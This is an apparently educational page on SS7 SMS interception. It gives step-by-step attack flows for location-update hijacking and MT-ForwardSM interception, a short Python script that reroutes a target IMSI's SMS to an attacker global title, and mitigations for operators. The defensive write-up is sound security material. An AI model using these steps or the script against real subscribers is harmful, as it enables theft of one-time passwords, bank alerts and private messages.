SS7 SMS Interception Attacks
Methods to intercept text messages
SS7 SMS interception attacks exploit vulnerabilities in the Signaling System No. 7 protocol to capture text messages intended for a target subscriber. These attacks manipulate the network's routing information to redirect SMS messages through an attacker-controlled path, allowing the attacker to read sensitive information, including authentication codes, private communications, and confidential data.
Security Implications
- Interception of two-factor authentication codes
- Capture of banking transaction notifications
- Access to private communications
- Compromise of business communications
- Interception of one-time passwords (OTPs)
- Capture of sensitive personal information
Technical Prerequisites
- Access to SS7 network (direct or via compromised operator)
- Knowledge of target's MSISDN (phone number) and IMSI
- SS7 message crafting capabilities
- Global Title (GT) spoofing ability
- SMS routing infrastructure
- SMS forwarding capabilities to avoid detection
SMS Interception Techniques
Technical Details
This attack combines two SS7 operations to redirect SMS messages to an attacker-controlled device. It's similar to the call interception attack but specifically targets SMS traffic.
First, the attacker sends a fraudulent UpdateLocation message to the target's HLR, impersonating a VLR in the attacker's control. This tricks the HLR into believing the subscriber has moved to the attacker's network.
The HLR then sends InsertSubscriberData to the attacker's fake VLR, providing subscriber profile information. The attacker acknowledges this data, completing the location update process.
Once the HLR updates its records, all incoming SMS messages to the target are routed through the attacker's fake VLR, allowing the attacker to intercept, read, and optionally forward the messages to the actual recipient.
Attack Flow
- Attacker obtains target's MSISDN (phone number) and IMSI
- Attacker crafts an UpdateLocation message with the target's IMSI
- Attacker sets the VLR address to a GT under their control
- Message is sent to target's home network HLR
- HLR processes the request without adequate authentication
- HLR updates its database with the new VLR location
- HLR sends InsertSubscriberData to the attacker's fake VLR
- Attacker acknowledges receipt of subscriber data
- HLR sends CancelLocation to the legitimate VLR
- All incoming SMS messages are now routed to the attacker's network
- Attacker can read messages and forward them to hide the attack
Mitigation
Implement UL validation and SMS Home Routing
- Implement UL validation and SMS Home Routing
- Verify the source GT against known legitimate VLRs
- Check for suspicious location changes (e.g., international jumps)
- Implement velocity checking to detect impossible movement patterns
- Monitor for multiple rapid location updates
Technical Details
The MT-ForwardSM (Mobile Terminated Forward Short Message) MAP operation is used to deliver SMS messages from the SMSC to the recipient's MSC/VLR.
In this attack, the attacker manipulates the SMS routing path by intercepting and modifying MT-ForwardSM messages. This can be done by positioning themselves in the signaling path or by manipulating routing tables in compromised network elements.
The attacker can capture the SMS content, potentially modify it, and then forward it to the intended recipient to avoid detection. This attack is particularly effective against SMS messages containing sensitive information like one-time passwords or banking notifications.
Attack Flow
- Attacker obtains target's MSISDN and identifies their serving MSC/VLR
- Attacker positions themselves in the signaling path or compromises routing
- When an SMS is sent to the target, the SMSC queries the HLR for routing info
- SMSC sends MT-ForwardSM message toward the target's MSC/VLR
- The message is intercepted by the attacker due to routing manipulation
- Attacker extracts and reads the SMS content
- Attacker forwards the message to the actual recipient to avoid detection
- Target receives the message with no indication of interception
Mitigation
Implement SMS path validation
- Implement SMS path validation
- Secure routing tables against unauthorized modifications
- Monitor for unusual SMS routing patterns
- Consider end-to-end encryption for sensitive SMS content
- Implement SMS Home Routing architecture
Exploitation Example
from sigploit.ss7.interception import insertSubscriberData
# Target IMSI (subscriber identity)
target_imsi = '204080123456789'
# Attacker's parameters
attacker_gt = '20408999999'
attacker_sms_center = '20408888888'
# SS7 connection parameters
ss7_params = {
'sctp_port': 2905,
'target_ip': '10.0.0.1',
'source_pc': 1,
'destination_pc': 2,
'source_ssn': 8,
'destination_ssn': 6
}
# Execute the attack
result = insertSubscriberData.modify_sms_routing(
target_imsi=target_imsi,
attacker_gt=attacker_gt,
attacker_smsc=attacker_sms_center,
**ss7_params
)
print(f"Attack status: {result.get('status')}")
print(f"VLR response: {result.get('response')}")
Ethical Considerations
This code is provided for educational purposes only. Intercepting SMS messages without consent is illegal in most jurisdictions and violates privacy laws. Always obtain proper authorization before conducting security testing on telecommunications networks.